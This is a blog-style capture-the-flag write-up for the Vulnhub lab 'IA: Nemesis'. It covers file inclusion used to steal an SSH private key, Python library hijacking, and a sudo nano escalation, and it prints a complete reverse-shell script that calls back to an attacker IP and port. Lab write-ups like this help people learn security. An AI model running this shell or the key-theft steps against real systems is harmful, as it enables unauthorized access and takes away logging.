IA: Nemesis Vulnhub Writeup

Difficulty: Medium/Hard

NMAP:

Nice some ports re opens, and ssh is on port: 52846 , let’s browse

But nothing interesting here, we noticee that port 52845 is http, let’s browse

Now let’s enumerate the browser and we can found something interesting.

Let’s move on “Contact us” , we can write so, we can do a command injection?

LFI:

Nice and we have username!

thanos and carlos are the users, so we can try to find RSA key in the follow directory /home/thanos/.ssh/id_rsa and and try to enter in ssh!!

And we have the KEY!!!!!! Save it in file id_rsa and give the permission: chmod 600 id_rsa and let’s login in ssh!!

GOT FIRST FLAG!! Now let’s enumerate!

User Enumeration:

We find the file “backup.py” at this moment i stuck! but thank you google! i found how to bypass this step!

Privilege Escalation:

https://rastating.github.io/privilege-escalation-via-python-library-hijacking/

import os
import pty
import socket

lhost = “10.2.0.3”
lport = 4444

ZIP_DEFLATED = 0

class ZipFile:
def close(*args):
return

def write(*args):
return

def __init__(self, *args):
return

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((lhost, lport))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
os.putenv(“HISTFILE”,’/dev/null’)
pty.spawn(“/bin/bash”)
s.close()

After creating our script, give execute permission chmod +x zipfile.py and listen on the netcat!

We notice that file “backup.py” execute always every one minutes! So just listen on the port!

Nice we take the second flag!!!! Now let’s go to root this box!

We have an hint in the file root.txt! So let’s see this file!

As we can see , this hash encrypted is encrypted with affine encryption!!! So we need to fine on google “affine chiper decrypt”!

And we finally found the password! But didn’t work for root, so we can use that for carlos, for finding sudo vulnerabilities!

Vertical Privilege Escalation:

Go on GTFO bins and find “nano”

Command: sudo /bin/nano /opt/priv

BUT! For doing this just become on the shell of thanos and press su carlos and insert password

ROOT!

I Hope this is usefull! Follow me on Twitter too @ 0xJin

Jin

--

--

--

| eCPTX | C|EH Master | CompTIA Security + | eJPT |

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

ICON in Numbers #37 (week 23/24–2021)

Privacy Policy

Blockchain technology is to give users their personal data back

{UPDATE} Music Quiz - Guess the Song Hack Free Resources Generator

Do the Pros outway the Cons for AirTags

{UPDATE} 3D Quad Bikes Unlimited HD Full Version Hack Free Resources Generator

OPTIMISM HAS BEEN HACKED AND LOST ABOUT 20 MILLION $OP WORTH OF $13 MILLION USD

Protocol

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
0xJin

0xJin

| eCPTX | C|EH Master | CompTIA Security + | eJPT |

More from Medium

FileZilla Client — Cleartext Storage of Sensitive Information in Memory Vulnerability…

Log4Shell Exploitation (CVE-2021–44228)

Natas — Overthewire Writeup (0–15)

XposedAPI — OffSec Proving Grounds Lab Write-Up